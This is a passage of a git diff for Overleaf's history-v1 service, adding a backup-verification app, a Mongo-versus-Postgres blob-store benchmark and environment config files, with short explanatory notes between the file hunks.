+  logger.info({ signal }, 'graceful shutdown: started shutdown sequence')
+  await drainQueue()
+  server.close(function () {
+    logger.info({ signal }, 'graceful shutdown: closed server')
+    setTimeout(() => {
+      process.exit(0)
+    }, 1000)
+  })
+}
+
+/**
+ * @param {number} port
+ * @return {Promise<http.Server>}
+ */
+export async function startApp(port) {
+  await healthCheck()
+  const server = http.createServer(app)
+  await promisify(server.listen.bind(server, port))()
+  const signals = ['SIGINT', 'SIGTERM']
+  signals.forEach(signal => {
+    process.on(signal, () => triggerGracefulShutdown(server, signal))
+  })
+  return server
+}
+
+// Run this if we're called directly
+if (process.argv[1] === fileURLToPath(import.meta.url)) {
+  const PORT = parseInt(process.env.PORT || '3103', 10)
+  await startApp(PORT)
+}
diff --git a/services/history-v1/backupVerifier/ProjectMetrics.mjs b/services/history-v1/backupVerifier/ProjectMetrics.mjs
new file mode 100644
index 0000000..ff37085
--- /dev/null
+++ b/services/history-v1/backupVerifier/ProjectMetrics.mjs
@@ -0,0 +1,33 @@
+import Metrics from '@overleaf/metrics'
+import { objectIdFromDate } from './utils.mjs'
+import { db } from '../storage/lib/mongodb.js'
+
+const projectsCollection = db.collection('projects')
+
+/**
+ *
+ * @param {Date} beforeTime
+ * @return {Promise<void>}
+ */
+export async function measurePendingChangesBeforeTime(beforeTime) {
+  const pendingChangeCount = await projectsCollection.countDocuments({
+    'overleaf.backup.pendingChangeAt': {
+      $lt: beforeTime,
+    },
+  })
+
+  Metrics.gauge('backup_verification_pending_changes', pendingChangeCount)
+}
+
+/**
+ *
+ * @param {Date} graceTime
+ * @return {Promise<void>}
+ */
+export async function measureNeverBackedUpProjects(graceTime) {
+  const neverBackedUpCount = await projectsCollection.countDocuments({
+    'overleaf.backup.lastBackedUpVersion': null,
+    _id: { $lt: objectIdFromDate(graceTime) },
+  })
+  Metrics.gauge('backup_verification_never_backed_up', neverBackedUpCount)
+}
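Note: measureNeverBackedUpProjects can use an _id bound as a time bound because MongoDB ObjectIds embed their creation timestamp. A minimal sketch of that property, using only the mongodb driver's documented API (the date is illustrative):

import { ObjectId } from 'mongodb'

// ObjectId.createFromTime takes seconds since the epoch, so comparing
// _ids is equivalent to comparing document creation times.
const cutoff = ObjectId.createFromTime(Date.parse('2024-01-01') / 1000)
// { _id: { $lt: cutoff } } matches documents created before 2024-01-01
console.log(cutoff.getTimestamp()) // 2024-01-01T00:00:00.000Z
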
diff --git a/services/history-v1/backupVerifier/ProjectSampler.mjs b/services/history-v1/backupVerifier/ProjectSampler.mjs
new file mode 100644
index 0000000..93d9a1a
--- /dev/null
+++ b/services/history-v1/backupVerifier/ProjectSampler.mjs
@@ -0,0 +1,79 @@
+// @ts-check
+import { objectIdFromDate } from './utils.mjs'
+import { db } from '../storage/lib/mongodb.js'
+import config from 'config'
+
+const projectsCollection = db.collection('projects')
+
+const HAS_PROJECTS_WITHOUT_HISTORY =
+  config.get('hasProjectsWithoutHistory') === 'true'
+
+/**
+ * @param {Date} start
+ * @param {Date} end
+ * @param {number} N
+ * @yields {string}
+ */
+export async function* getProjectsCreatedInDateRangeCursor(start, end, N) {
+  yield* getSampleProjectsCursor(N, [
+    {
+      $match: {
+        _id: {
+          $gt: objectIdFromDate(start),
+          $lte: objectIdFromDate(end),
+        },
+      },
+    },
+  ])
+}
+
+export async function* getProjectsUpdatedInDateRangeCursor(start, end, N) {
+  yield* getSampleProjectsCursor(N, [
+    {
+      $match: {
+        'overleaf.history.updatedAt': {
+          $gt: start,
+          $lte: end,
+        },
+      },
+    },
+  ])
+}
+
+/**
+ * @typedef {import('mongodb').Document} Document
+ */
+
+/**
+ *
+ * @generator
+ * @param {number} N
+ * @param {Array<Document>} preSampleAggregationStages
+ * @yields {string}
+ */
+export async function* getSampleProjectsCursor(
+  N,
+  preSampleAggregationStages = []
+) {
+  const cursor = projectsCollection.aggregate([
+    ...preSampleAggregationStages,
+    { $sample: { size: N } },
+    { $project: { 'overleaf.history.id': 1 } },
+  ])
+
+  let validProjects = 0
+  let hasInvalidProject = false
+
+  for await (const project of cursor) {
+    if (HAS_PROJECTS_WITHOUT_HISTORY && !project.overleaf?.history?.id) {
+      hasInvalidProject = true
+      continue
+    }
+    validProjects++
+    yield project.overleaf.history.id.toString()
+  }
+
+  if (validProjects === 0 && hasInvalidProject) {
+    yield* getSampleProjectsCursor(N, preSampleAggregationStages)
+  }
+}
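Note: the samplers are async generators, so callers stream history IDs instead of materialising the whole sample. A minimal consumption sketch, assuming the service config is loaded and Mongo is connected:

import { getSampleProjectsCursor } from './backupVerifier/ProjectSampler.mjs'

// Stream 10 randomly sampled history ids; each yielded value is a string.
for await (const historyId of getSampleProjectsCursor(10)) {
  console.log('sampled history id', historyId)
}

One caution grounded in the code above: when a sample contains only projects without history IDs, getSampleProjectsCursor re-samples recursively, so a dataset consisting entirely of such projects could retry indefinitely.
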
diff --git a/services/history-v1/backupVerifier/ProjectVerifier.mjs b/services/history-v1/backupVerifier/ProjectVerifier.mjs
new file mode 100644
index 0000000..1e4086b
--- /dev/null
+++ b/services/history-v1/backupVerifier/ProjectVerifier.mjs
@@ -0,0 +1,320 @@
+// @ts-check
+import { verifyProjectWithErrorContext } from '../storage/lib/backupVerifier.mjs'
+import { promiseMapSettledWithLimit } from '@overleaf/promise-utils'
+import logger from '@overleaf/logger'
+import metrics from '@overleaf/metrics'
+import {
+  getSampleProjectsCursor,
+  getProjectsCreatedInDateRangeCursor,
+  getProjectsUpdatedInDateRangeCursor,
+} from './ProjectSampler.mjs'
+import OError from '@overleaf/o-error'
+import { setTimeout } from 'node:timers/promises'
+
+const MS_PER_30_DAYS = 30 * 24 * 60 * 60 * 1000
+
+const failureCounter = new metrics.prom.Counter({
+  name: 'backup_project_verification_failed',
+  help: 'Number of projects that failed verification',
+  labelNames: ['name'],
+})
+
+const successCounter = new metrics.prom.Counter({
+  name: 'backup_project_verification_succeeded',
+  help: 'Number of projects that succeeded verification',
+})
+
+let WRITE_METRICS = false
+
+/**
+ * @typedef {import('node:events').EventEmitter} EventEmitter
+ */
+
+/**
+ * Allows writing metrics to be enabled or disabled.
+ * @param {Boolean} writeMetrics
+ */
+export function setWriteMetrics(writeMetrics) {
+  WRITE_METRICS = writeMetrics
+}
+
+/**
+ *
+ * @param {Error|unknown} error
+ * @param {string} historyId
+ */
+function handleVerificationError(error, historyId) {
+  const name = error instanceof Error ? error.name : 'UnknownError'
+  logger.error({ historyId, error, name }, 'error verifying project backup')
+
+  WRITE_METRICS && failureCounter.inc({ name })
+
+  return name
+}
+
+/**
+ *
+ * @param {Date} startDate
+ * @param {Date} endDate
+ * @param {number} interval
+ * @returns {Array<VerificationJobSpecification>}
+ */
+function splitJobs(startDate, endDate, interval) {
+  /** @type {Array<VerificationJobSpecification>} */
+  const jobs = []
+  while (startDate < endDate) {
+    const nextStart = new Date(
+      Math.min(startDate.getTime() + interval, endDate.getTime())
+    )
+    jobs.push({ startDate, endDate: nextStart })
+    startDate = nextStart
+  }
+  return jobs
+}
+
+/**
+ *
+ * @param {AsyncGenerator<string>} historyIdCursor
+ * @param {EventEmitter} [eventEmitter]
+ * @param {number} [delay] - Allows a delay between each verification
+ * @return {Promise<{verified: number, total: number, errorTypes: *[], hasFailure: boolean}>}
+ */
+async function verifyProjectsFromCursor(
+  historyIdCursor,
+  eventEmitter,
+  delay = 0
+) {
+  const errorTypes = []
+  let verified = 0
+  let total = 0
+  let receivedShutdownSignal = false
+  if (eventEmitter) {
+    eventEmitter.once('shutdown', () => {
+      receivedShutdownSignal = true
+    })
+  }
+  for await (const historyId of historyIdCursor) {
+    if (receivedShutdownSignal) {
+      break
+    }
+    total++
+    try {
+      await verifyProjectWithErrorContext(historyId)
+      logger.debug({ historyId }, 'verified project backup successfully')
+      WRITE_METRICS && successCounter.inc()
+      verified++
+    } catch (error) {
+      const errorType = handleVerificationError(error, historyId)
+      errorTypes.push(errorType)
+    }
+    if (delay > 0) {
+      await setTimeout(delay)
+    }
+  }
+  return {
+    verified,
+    total,
+    errorTypes,
+    hasFailure: errorTypes.length > 0,
+  }
+}
+
+/**
+ *
+ * @param {number} nProjectsToSample
+ * @param {EventEmitter} [signal]
+ * @param {number} [delay]
+ * @return {Promise<VerificationJobStatus>}
+ */
+export async function verifyRandomProjectSample(
+  nProjectsToSample,
+  signal,
+  delay = 0
+) {
+  const historyIds = await getSampleProjectsCursor(nProjectsToSample)
+  return await verifyProjectsFromCursor(historyIds, signal, delay)
+}
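Note: splitJobs carves a date range into fixed-width windows, clamping the final window to endDate. A worked sketch of the expected output shape (the dates are illustrative):

// A 70-day range with the default 30-day interval yields three jobs:
const start = new Date('2025-01-01')
const end = new Date('2025-03-12') // 70 days later
// splitJobs(start, end, MS_PER_30_DAYS) =>
//   2025-01-01 -> 2025-01-31,
//   2025-01-31 -> 2025-03-02,
//   2025-03-02 -> 2025-03-12 (last window clamped to endDate)
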
+
+/**
+ * Samples projects with history IDs between the specified dates and verifies them.
+ *
+ * @param {Date} startDate
+ * @param {Date} endDate
+ * @param {number} projectsPerRange
+ * @param {EventEmitter} [signal]
+ * @return {Promise<VerificationJobStatus>}
+ */
+async function verifyRange(startDate, endDate, projectsPerRange, signal) {
+  logger.info({ startDate, endDate }, 'verifying range')
+
+  const results = await verifyProjectsFromCursor(
+    getProjectsCreatedInDateRangeCursor(startDate, endDate, projectsPerRange),
+    signal
+  )
+
+  if (results.total === 0) {
+    logger.debug(
+      { start: startDate, end: endDate },
+      'No projects found in range'
+    )
+  }
+
+  const jobStatus = {
+    ...results,
+    startDate,
+    endDate,
+  }
+
+  logger.debug(
+    { ...jobStatus, errorTypes: Array.from(new Set(jobStatus.errorTypes)) },
+    'Verified range'
+  )
+  return jobStatus
+}
+
+/**
+ * @typedef {Object} VerificationJobSpecification
+ * @property {Date} startDate
+ * @property {Date} endDate
+ */
+
+/**
+ * @typedef {import('./types.d.ts').VerificationJobStatus} VerificationJobStatus
+ */
+
+/**
+ * @typedef {Object} VerifyDateRangeOptions
+ * @property {Date} startDate
+ * @property {Date} endDate
+ * @property {number} [interval]
+ * @property {number} [projectsPerRange]
+ * @property {number} [concurrency]
+ * @property {EventEmitter} [signal]
+ */
+
+/**
+ *
+ * @param {VerifyDateRangeOptions} options
+ * @return {Promise<VerificationJobStatus>}
+ */
+export async function verifyProjectsCreatedInDateRange({
+  concurrency = 0,
+  projectsPerRange = 10,
+  startDate,
+  endDate,
+  interval = MS_PER_30_DAYS,
+  signal,
+}) {
+  const jobs = splitJobs(startDate, endDate, interval)
+  if (jobs.length === 0) {
+    throw new OError('Time range could not be split into jobs', {
+      start: startDate,
+      end: endDate,
+      interval,
+    })
+  }
+  const settlements = await promiseMapSettledWithLimit(
+    concurrency,
+    jobs,
+    ({ startDate, endDate }) =>
+      verifyRange(startDate, endDate, projectsPerRange, signal)
+  )
+  return settlements.reduce(
+    /**
+     *
+     * @param {VerificationJobStatus} acc
+     * @param settlement
+     * @return {VerificationJobStatus}
+     */
+    (acc, settlement) => {
+      if (settlement.status !== 'rejected') {
+        if (settlement.value.hasFailure) {
+          acc.hasFailure = true
+        }
+        acc.total += settlement.value.total
+        acc.verified += settlement.value.verified
+        acc.errorTypes = acc.errorTypes.concat(settlement.value.errorTypes)
+      } else {
+        logger.error({ ...settlement.reason }, 'Error processing range')
+      }
+      return acc
+    },
+    /** @type {VerificationJobStatus} */
+    {
+      startDate,
+      endDate,
+      verified: 0,
+      total: 0,
+      hasFailure: false,
+      errorTypes: [],
+    }
+  )
+}
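Note: a hedged invocation sketch for the range verifier; the option values below are illustrative, not recommendations:

import { verifyProjectsCreatedInDateRange } from './backupVerifier/ProjectVerifier.mjs'

// Verify 10 sampled projects per 30-day window over the last 90 days,
// running up to 2 windows concurrently.
const status = await verifyProjectsCreatedInDateRange({
  startDate: new Date(Date.now() - 90 * 24 * 60 * 60 * 1000),
  endDate: new Date(),
  projectsPerRange: 10,
  concurrency: 2,
})
console.log(status.verified, 'of', status.total, 'verified')
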
+
+/**
+ * Verifies that projects that have recently gone out of RPO have been updated.
+ *
+ * @param {Date} startDate
+ * @param {Date} endDate
+ * @param {number} nProjects
+ * @param {EventEmitter} [signal]
+ * @return {Promise<VerificationJobStatus>}
+ */
+export async function verifyProjectsUpdatedInDateRange(
+  startDate,
+  endDate,
+  nProjects,
+  signal
+) {
+  logger.debug(
+    { startDate, endDate, nProjects },
+    'Sampling projects updated in date range'
+  )
+  const results = await verifyProjectsFromCursor(
+    getProjectsUpdatedInDateRangeCursor(startDate, endDate, nProjects),
+    signal
+  )
+
+  if (results.total === 0) {
+    logger.debug(
+      { start: startDate, end: endDate },
+      'No projects updated recently'
+    )
+  }
+
+  const jobStatus = {
+    ...results,
+    startDate,
+    endDate,
+  }
+
+  logger.debug(
+    { ...jobStatus, errorTypes: Array.from(new Set(jobStatus.errorTypes)) },
+    'Verified recently updated projects'
+  )
+  return jobStatus
+}
+
+/**
+ *
+ * @param {EventEmitter} signal
+ * @return {void}
+ */
+export function loopRandomProjects(signal) {
+  let shutdown = false
+  signal.on('shutdown', function () {
+    shutdown = true
+  })
+  async function loop() {
+    do {
+      try {
+        const result = await verifyRandomProjectSample(100, signal, 2_000)
+        logger.debug({ result }, 'verified random project sample')
+      } catch (error) {
+        logger.error({ error }, 'error verifying random project sample')
+      }
+      // eslint-disable-next-line no-unmodified-loop-condition
+    } while (!shutdown)
+  }
+  loop()
+}
diff --git a/services/history-v1/backupVerifier/healthCheck.mjs b/services/history-v1/backupVerifier/healthCheck.mjs
new file mode 100644
index 0000000..af99874
--- /dev/null
+++ b/services/history-v1/backupVerifier/healthCheck.mjs
@@ -0,0 +1,32 @@
+import config from 'config'
+import { verifyProjectWithErrorContext } from '../storage/lib/backupVerifier.mjs'
+import {
+  measureNeverBackedUpProjects,
+  measurePendingChangesBeforeTime,
+} from './ProjectMetrics.mjs'
+import { getEndDateForRPO, RPO } from './utils.mjs'
+
+/** @type {Array<string>} */
+const HEALTH_CHECK_PROJECTS = JSON.parse(config.get('healthCheckProjects'))
+
+export async function healthCheck() {
+  if (!Array.isArray(HEALTH_CHECK_PROJECTS)) {
+    throw new Error('expected healthCheckProjects to be an array')
+  }
+  if (HEALTH_CHECK_PROJECTS.length !== 2) {
+    throw new Error('expected 2 healthCheckProjects')
+  }
+  if (!HEALTH_CHECK_PROJECTS.some(id => id.length === 24)) {
+    throw new Error('expected mongo id in healthCheckProjects')
+  }
+  if (!HEALTH_CHECK_PROJECTS.some(id => id.length < 24)) {
+    throw new Error('expected postgres id in healthCheckProjects')
+  }
+
+  for (const historyId of HEALTH_CHECK_PROJECTS) {
+    await verifyProjectWithErrorContext(historyId)
+  }
+
+  await measurePendingChangesBeforeTime(getEndDateForRPO(2))
+  await measureNeverBackedUpProjects(getEndDateForRPO(2))
+}
diff --git a/services/history-v1/backupVerifier/types.d.ts b/services/history-v1/backupVerifier/types.d.ts
new file mode 100644
index 0000000..7bfa4a8
--- /dev/null
+++ b/services/history-v1/backupVerifier/types.d.ts
@@ -0,0 +1,8 @@
+export type VerificationJobStatus = {
+  verified: number
+  total: number
+  startDate?: Date
+  endDate?: Date
+  hasFailure: boolean
+  errorTypes: Array<string>
+}
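Note: healthCheck expects exactly two seeded project IDs, one 24-hex Mongo ID and one short Postgres ID, so both chunk-store backends are exercised. The test config later in this commit uses exactly that shape; a sketch of the expected value (the IDs mirror config/test.json and are placeholders):

// config/*.json stores the list as stringified JSON:
//   "healthCheckProjects": "[\"42\",\"000000000000000000000042\"]"
// After JSON.parse:
//   ['42', '000000000000000000000042'] // postgres id, mongo id
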
diff --git a/services/history-v1/backupVerifier/utils.mjs b/services/history-v1/backupVerifier/utils.mjs
new file mode 100644
index 0000000..b2d7ed2
--- /dev/null
+++ b/services/history-v1/backupVerifier/utils.mjs
@@ -0,0 +1,35 @@
+import { ObjectId } from 'mongodb'
+import config from 'config'
+
+export const RPO = parseInt(config.get('backupRPOInMS'), 10)
+
+/**
+ * @param {Date} time
+ * @return {ObjectId}
+ */
+export function objectIdFromDate(time) {
+  return ObjectId.createFromTime(time.getTime() / 1000)
+}
+
+/**
+ * @param {number} [factor] - Multiply RPO by this factor, default is 1
+ * @return {Date}
+ */
+export function getEndDateForRPO(factor = 1) {
+  return new Date(Date.now() - RPO * factor)
+}
+
+/**
+ * Creates a startDate, endDate pair that checks a period of time before the RPO horizon
+ *
+ * @param {number} offset - How many seconds we should check
+ * @return {{endDate: Date, startDate: Date}}
+ */
+export function getDatesBeforeRPO(offset) {
+  const now = new Date()
+  const endDate = new Date(now.getTime() - RPO)
+  return {
+    endDate,
+    startDate: new Date(endDate.getTime() - offset * 1000),
+  }
+}
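Note: with backupRPOInMS at its default.json value of one hour, the helpers resolve as in this small worked sketch:

// Assuming RPO = 3600000 (1 hour) and "now" = 12:00:
// getEndDateForRPO(2)     => 10:00 (two RPO periods before now)
// getDatesBeforeRPO(7200) => { startDate: 09:00, endDate: 11:00 }
//   i.e. a 2-hour window ending at the RPO horizon.
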
diff --git a/services/history-v1/benchmarks/blob_store.js b/services/history-v1/benchmarks/blob_store.js
new file mode 100644
index 0000000..9efad87
--- /dev/null
+++ b/services/history-v1/benchmarks/blob_store.js
@@ -0,0 +1,82 @@
+const crypto = require('node:crypto')
+const benny = require('benny')
+const { Blob } = require('overleaf-editor-core')
+const mongoBackend = require('../storage/lib/blob_store/mongo')
+const postgresBackend = require('../storage/lib/blob_store/postgres')
+const cleanup = require('../test/acceptance/js/storage/support/cleanup')
+
+const MONGO_PROJECT_ID = '637386deb4ce3c62acd3848e'
+const POSTGRES_PROJECT_ID = '123'
+
+async function run() {
+  for (const blobCount of [1, 10, 100, 1000, 10000, 100000, 500000]) {
+    await cleanup.everything()
+    const blobs = createBlobs(blobCount)
+    await insertBlobs(blobs)
+    const randomHashes = getRandomHashes(blobs, 100)
+    await benny.suite(
+      `Read a blob in a project with ${blobCount} blobs`,
+      benny.add('Mongo backend', async () => {
+        await mongoBackend.findBlob(MONGO_PROJECT_ID, randomHashes[0])
+      }),
+      benny.add('Postgres backend', async () => {
+        await postgresBackend.findBlob(POSTGRES_PROJECT_ID, randomHashes[0])
+      }),
+      benny.cycle(),
+      benny.complete()
+    )
+    await benny.suite(
+      `Read 100 blobs in a project with ${blobCount} blobs`,
+      benny.add('Mongo backend', async () => {
+        await mongoBackend.findBlobs(MONGO_PROJECT_ID, randomHashes)
+      }),
+      benny.add('Postgres backend', async () => {
+        await postgresBackend.findBlobs(POSTGRES_PROJECT_ID, randomHashes)
+      }),
+      benny.cycle(),
+      benny.complete()
+    )
+    await benny.suite(
+      `Insert a blob in a project with ${blobCount} blobs`,
+      benny.add('Mongo backend', async () => {
+        const [newBlob] = createBlobs(1)
+        await mongoBackend.insertBlob(MONGO_PROJECT_ID, newBlob)
+      }),
+      benny.add('Postgres backend', async () => {
+        const [newBlob] = createBlobs(1)
+        await postgresBackend.insertBlob(POSTGRES_PROJECT_ID, newBlob)
+      }),
+      benny.cycle(),
+      benny.complete()
+    )
+  }
+}
+
+function createBlobs(blobCount) {
+  const blobs = []
+  for (let i = 0; i < blobCount; i++) {
+    const hash = crypto.randomBytes(20).toString('hex')
+    blobs.push(new Blob(hash, 42, 42))
+  }
+  return blobs
+}
+
+async function insertBlobs(blobs) {
+  for (const blob of blobs) {
+    await Promise.all([
+      mongoBackend.insertBlob(MONGO_PROJECT_ID, blob),
+      postgresBackend.insertBlob(POSTGRES_PROJECT_ID, blob),
+    ])
+  }
+}
+
+function getRandomHashes(blobs, count) {
+  const hashes = []
+  for (let i = 0; i < count; i++) {
+    const index = Math.floor(Math.random() * blobs.length)
+    hashes.push(blobs[index].getHash())
+  }
+  return hashes
+}
+
+module.exports = run
diff --git a/services/history-v1/benchmarks/index.js b/services/history-v1/benchmarks/index.js
new file mode 100644
index 0000000..5cc5baf
--- /dev/null
+++ b/services/history-v1/benchmarks/index.js
@@ -0,0 +1,17 @@
+const testSetup = require('../test/setup')
+const blobStoreSuite = require('./blob_store')
+
+async function main() {
+  await testSetup.setupPostgresDatabase()
+  await testSetup.createGcsBuckets()
+  await blobStoreSuite()
+}
+
+main()
+  .then(() => {
+    process.exit(0)
+  })
+  .catch(err => {
+    console.error(err)
+    process.exit(1)
+  })
diff --git a/services/history-v1/buildscript.txt b/services/history-v1/buildscript.txt
new file mode 100644
index 0000000..f3e029b
--- /dev/null
+++ b/services/history-v1/buildscript.txt
@@ -0,0 +1,10 @@
+history-v1
+--dependencies=postgres,gcs,mongo,redis,s3
+--docker-repos=us-east1-docker.pkg.dev/overleaf-ops/ol-docker
+--env-add=
+--env-pass-through=
+--esmock-loader=False
+--node-version=20.18.2
+--public-repo=False
+--script-version=4.7.0
+--tsconfig-extra-includes=backup-deletion-app.mjs,backup-verifier-app.mjs,backup-worker-app.mjs,api/**/*,migrations/**/*,storage/**/*
diff --git a/services/history-v1/config/custom-environment-variables.json b/services/history-v1/config/custom-environment-variables.json
new file mode 100644
index 0000000..d07ae29
--- /dev/null
+++ b/services/history-v1/config/custom-environment-variables.json
@@ -0,0 +1,104 @@
+{
+  "databaseUrl": "HISTORY_CONNECTION_STRING",
+  "databaseUrlReadOnly": "HISTORY_FOLLOWER_CONNECTION_STRING",
+  "herokuDatabaseUrl": "DATABASE_URL",
+  "databasePoolMin": "DATABASE_POOL_MIN",
+  "databasePoolMax": "DATABASE_POOL_MAX",
+  "persistor": {
+    "backend": "PERSISTOR_BACKEND",
+    "s3": {
+      "key": "AWS_ACCESS_KEY_ID",
+      "secret": "AWS_SECRET_ACCESS_KEY",
+      "endpoint": "AWS_S3_ENDPOINT",
+      "pathStyle": "AWS_S3_PATH_STYLE",
+      "maxRetries": "S3_MAX_RETRIES",
+      "httpOptions": {
+        "timeout": "S3_TIMEOUT"
+      }
+    },
+    "gcs": {
+      "deletedBucketSuffix": "GCS_DELETED_BUCKET_SUFFIX",
+      "unlockBeforeDelete": "GCS_UNLOCK_BEFORE_DELETE",
+      "endpoint": {
+        "apiEndpoint": "GCS_API_ENDPOINT",
+        "projectId": "GCS_PROJECT_ID"
+      },
+      "retryOptions": {
+        "maxRetries": "GCS_MAX_RETRIES",
+        "idempotencyStrategy": "GCS_IDEMPOTENCY_STRATEGY"
+      }
+    },
+    "fallback": {
+      "backend": "PERSISTOR_FALLBACK_BACKEND",
+      "buckets": "PERSISTOR_BUCKET_MAPPING"
+    }
+  },
+  "backupPersistor": {
+    "keyEncryptionKeys": "BACKUP_KEY_ENCRYPTION_KEYS",
+    "s3SSEC": {
+      "key": "AWS_ACCESS_KEY_ID",
+      "secret": "AWS_SECRET_ACCESS_KEY",
+      "endpoint": "AWS_S3_ENDPOINT",
+      "pathStyle": "AWS_S3_PATH_STYLE",
+      "maxRetries": "BACKUP_S3_MAX_RETRIES",
+      "httpOptions": {
+        "timeout": "BACKUP_S3_TIMEOUT"
+      }
+    }
+  },
+  "blobStore": {
+    "globalBucket": "OVERLEAF_EDITOR_BLOBS_BUCKET",
+    "projectBucket": "OVERLEAF_EDITOR_PROJECT_BLOBS_BUCKET"
+  },
+  "chunkStore": {
+    "historyStoreConcurrency": "HISTORY_STORE_CONCURRENCY",
+    "bucket": "OVERLEAF_EDITOR_CHUNKS_BUCKET"
+  },
+  "zipStore": {
+    "bucket": "OVERLEAF_EDITOR_ZIPS_BUCKET",
+    "zipTimeoutMs": "ZIP_STORE_ZIP_TIMEOUT_MS"
+  },
+  "backupStore": {
+    "chunksBucket": "BACKUP_OVERLEAF_EDITOR_CHUNKS_BUCKET",
+    "deksBucket": "BACKUP_OVERLEAF_EDITOR_DEKS_BUCKET",
+    "globalBlobsBucket": "BACKUP_OVERLEAF_EDITOR_GLOBAL_BLOBS_BUCKET",
+    "projectBlobsBucket": "BACKUP_OVERLEAF_EDITOR_PROJECT_BLOBS_BUCKET"
+  },
+  "healthCheckBlobs": "HEALTH_CHECK_BLOBS",
+  "healthCheckProjects": "HEALTH_CHECK_PROJECTS",
+  "backupRPOInMS": "BACKUP_RPO_IN_MS",
+  "minSoftDeletionPeriodDays": "MIN_SOFT_DELETION_PERIOD_DAYS",
+  "mongo": {
+    "uri": "MONGO_CONNECTION_STRING"
+  },
+  "basicHttpAuth": {
+    "password": "STAGING_PASSWORD",
+    "oldPassword": "BASIC_HTTP_AUTH_OLD_PASSWORD"
+  },
+  "jwtAuth": {
+    "key": "OT_JWT_AUTH_KEY",
+    "oldKey": "OT_JWT_AUTH_OLD_KEY",
+    "algorithm": "OT_JWT_AUTH_ALG"
+  },
+  "clusterWorkers": "CLUSTER_WORKERS",
+  "maxFileUploadSize": "MAX_FILE_UPLOAD_SIZE",
+  "httpsOnly": "HTTPS_ONLY",
+  "httpRequestTimeout": "HTTP_REQUEST_TIMEOUT",
+  "redis": {
+    "queue": {
+      "host": "QUEUES_REDIS_HOST",
+      "password": "QUEUES_REDIS_PASSWORD",
+      "port": "QUEUES_REDIS_PORT"
+    },
+    "history": {
+      "host": "HISTORY_REDIS_HOST",
+      "password": "HISTORY_REDIS_PASSWORD",
+      "port": "HISTORY_REDIS_PORT"
+    },
+    "lock": {
+      "host": "REDIS_HOST",
+      "password": "REDIS_PASSWORD",
+      "port": "REDIS_PORT"
+    }
+  }
+}
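Note: custom-environment-variables.json is node-config's standard override map: each leaf names an environment variable whose value, when set, replaces the corresponding config key at load time. A minimal sketch of the behaviour (the variable value is illustrative):

// With BACKUP_RPO_IN_MS=7200000 set in the environment:
const config = require('config')
config.get('backupRPOInMS') // => '7200000', overriding default.json's '3600000'
// Unset variables leave the values from default.json and the
// NODE_ENV-specific file (e.g. production.json) untouched.
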
"oldPassword": "BASIC_HTTP_AUTH_OLD_PASSWORD" + }, + "jwtAuth": { + "key": "OT_JWT_AUTH_KEY", + "oldKey": "OT_JWT_AUTH_OLD_KEY", + "algorithm": "OT_JWT_AUTH_ALG" + }, + "clusterWorkers": "CLUSTER_WORKERS", + "maxFileUploadSize": "MAX_FILE_UPLOAD_SIZE", + "httpsOnly": "HTTPS_ONLY", + "httpRequestTimeout": "HTTP_REQUEST_TIMEOUT", + "redis": { + "queue": { + "host": "QUEUES_REDIS_HOST", + "password": "QUEUES_REDIS_PASSWORD", + "port": "QUEUES_REDIS_PORT" + }, + "history": { + "host": "HISTORY_REDIS_HOST", + "password": "HISTORY_REDIS_PASSWORD", + "port": "HISTORY_REDIS_PORT" + }, + "lock": { + "host": "REDIS_HOST", + "password": "REDIS_PASSWORD", + "port": "REDIS_PORT" + } + } +} diff --git a/services/history-v1/config/default.json b/services/history-v1/config/default.json new file mode 100644 index 0000000..5222b84 --- /dev/null +++ b/services/history-v1/config/default.json @@ -0,0 +1,43 @@ +{ + "persistor": { + "backend": "s3", + "s3": { + "signedUrlExpiryInMs": "1800000", + "maxRetries": "1", + "httpOptions": { + "timeout": "8000" + } + }, + "gcs": { + "signedUrlExpiryInMs": "1800000", + "deleteConcurrency": "50" + } + }, + "backupPersistor": { + "backend": "s3SSEC", + "s3SSEC": { + "maxRetries": "1", + "pathStyle": false, + "httpOptions": { + "timeout": "120000" + } + } + }, + "backupRPOInMS": "3600000", + "chunkStore": { + "historyStoreConcurrency": "4" + }, + "zipStore": { + "zipTimeoutMs": "360000" + }, + "hasProjectsWithoutHistory": false, + "minSoftDeletionPeriodDays": "90", + "maxDeleteKeys": "1000", + "useDeleteObjects": "true", + "clusterWorkers": "1", + "maxFileUploadSize": "52428800", + "databasePoolMin": "2", + "databasePoolMax": "10", + "httpsOnly": "false", + "httpRequestTimeout": "300000" +} diff --git a/services/history-v1/config/development.json b/services/history-v1/config/development.json new file mode 100644 index 0000000..9cd73c6 --- /dev/null +++ b/services/history-v1/config/development.json @@ -0,0 +1,49 @@ +{ + "databaseUrl": "postgres://postgres:postgres@postgres/write_latex_dev", + "persistor": { + "s3": { + "endpoint": "http://s3:8080", + "pathStyle": "true" + }, + "gcs": { + "unsignedUrls": "true", + "endpoint": { + "apiEndpoint": "http://fake-gcs:9090", + "projectId": "fake" + } + } + }, + "blobStore": { + "globalBucket": "overleaf-development-blobs", + "projectBucket": "overleaf-development-project-blobs" + }, + "chunkStore": { + "bucket": "overleaf-development-chunks" + }, + "zipStore": { + "bucket": "overleaf-development-zips" + }, + "backupStore": { + "chunksBucket":"overleaf-development-history-chunks", + "deksBucket":"overleaf-development-history-deks", + "globalBlobsBucket":"overleaf-development-history-global-blobs", + "projectBlobsBucket":"overleaf-development-history-project-blobs" + }, + "backupPersistor": { + "keyEncryptionKeys": "[{\"key\":\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=\",\"salt\":\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=\"}]", + "s3SSEC": { + "ca": "[\"/certs/public.crt\"]" + } + }, + "useDeleteObjects": "false", + "mongo": { + "uri": "mongodb://mongo:27017/sharelatex" + }, + "basicHttpAuth": { + "password": "password" + }, + "jwtAuth": { + "key": "secureKey", + "algorithm": "HS256" + } +} diff --git a/services/history-v1/config/production.json b/services/history-v1/config/production.json new file mode 100644 index 0000000..23f836b --- /dev/null +++ b/services/history-v1/config/production.json @@ -0,0 +1,5 @@ +{ + "backupPersistor": { + "tieringStorageClass": "INTELLIGENT_TIERING" + } +} diff --git 
diff --git a/services/history-v1/config/test.json b/services/history-v1/config/test.json
new file mode 100644
index 0000000..c38e28e
--- /dev/null
+++ b/services/history-v1/config/test.json
@@ -0,0 +1,53 @@
+{
+  "databaseUrl": "postgres://overleaf:overleaf@postgres/overleaf-history-v1-test",
+  "databaseUrlReadOnly": "postgres://read_only:password@postgres/overleaf-history-v1-test",
+  "persistor": {
+    "backend": "gcs",
+    "gcs": {
+      "unsignedUrls": "true",
+      "endpoint": {
+        "apiEndpoint": "http://gcs:9090",
